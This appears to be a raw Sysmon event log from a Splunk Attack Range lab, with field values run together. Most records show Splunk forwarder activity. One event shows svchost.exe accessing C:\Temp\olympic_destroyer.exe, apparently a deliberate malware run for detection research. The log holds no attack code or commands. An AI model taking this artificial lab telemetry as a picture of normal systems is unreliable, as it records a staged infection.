AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57613- 354300x8000000000000000296605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.733{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49361-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000220604Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:13.493{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B34705D3844C7B66F1E70B7D0CFC334B,SHA256=8069506AFD76001F20C644AB45AAE70A607441F26E09DE67E7CBC4673FCBCEB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:13.232{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A09ADCFD8EF702C33DA3586B04D54589,SHA256=79443CFE5E19CFE8825DB1258D6E53A74AFD54FD78157E980DD586A1704512F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220605Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:14.524{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64D8C41103E36476F84E49F63C56009E,SHA256=B8754333A29A301FA6EC55570E7D6D97314EE2FC625814A2B628AC46284D98F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:14.507{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:14.247{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA395FE9DEE0AF36296A5C90F5D9E513,SHA256=9F3882B96948D7581EC2CA6769C87DFDD3A79E5311AC6AA07E08E3C3E410AE16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220606Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:15.602{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=085679016610A8536DAB7DBF80B4B9F5,SHA256=47480CD55ADC6ABE6AE50CFFCF55140B375DEE7D8AE1BFBB6D3D1DEDA0AC2CF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:15.511{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=171C346C0E3AD450ABA75F4E4B220B9A,SHA256=548747028DA84043EE204AEA40CDF334BA1C55E527FB88C3E51926D0FAB78425,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:15.277{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2789F2FE8E76EA0D49653EE3B105E310,SHA256=4279EC7585C01F6F1C3F9D1DBB60F135771D3576D5E3CDA91DA82961D0EFFAA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220607Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:16.603{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC0FA87F3EF7A485F64637B4C08AB7CA,SHA256=D2C362938425225AD6F338A6941977389488FF42AD3B22E4B5CDF8BC50CE6FC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:16.296{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3CAB19911F1C1667B5186A3BD8CCD87,SHA256=90C9BC414900F1BC79059D620C4193217EB2FEFB148F46FE71F2F6DFBECAE222,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220609Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:17.664{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3413B708CF7EE371D9639DF0824AD82,SHA256=762DE94ED3731825530121D1DF243BF2976FB0A4B3A6B02E51CF09790EA61673,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:17.306{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=874B4D2DC8FE886D86613C438D61082B,SHA256=69CEB9FADD2CE9CADED46200771901F12A25A3380B225969398AC0284B99FF79,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220608Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:14.585{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51594-false10.0.1.12-8000- 23542300x8000000000000000220610Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:18.664{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8076F795F7752A8C1BB3BDF504BDA258,SHA256=FCA434E085DAEB62B6009AAF8E5A71C9D284D7BF39C4552DDD17AF03CB18893E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:18.342{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E06587609D5DA365B9684A0FB44C53C,SHA256=E8D42129DAF3C251118B5B2691B167D99D64831C0D2ED8AC1F8FEB4EEC7C3AB8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:15.548{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49364-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000220611Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:19.680{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4497B24FFF624C29148FE91EA9124A3,SHA256=904B02913ACB0857C3C010FE953758873A84EC080BA6A1CCB03E0ED0607BC649,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.909{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1693-6216-0207-000000003802}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.909{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.909{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.909{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.909{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.909{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1693-6216-0207-000000003802}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.909{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1693-6216-0207-000000003802}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.910{C8EA50B7-1693-6216-0207-000000003802}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000296626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.745{C8EA50B7-1693-6216-0107-000000003802}18041020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.421{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E775E4C2025100641E3E7133233600E,SHA256=78630273621DBEB94F9FCD31887E03F6228A1019AD1BF73290AE78AA510C4633,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.305{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1693-6216-0107-000000003802}1804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.290{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.290{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.290{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.290{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.290{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1693-6216-0107-000000003802}1804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.290{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1693-6216-0107-000000003802}1804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:19.291{C8EA50B7-1693-6216-0107-000000003802}1804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 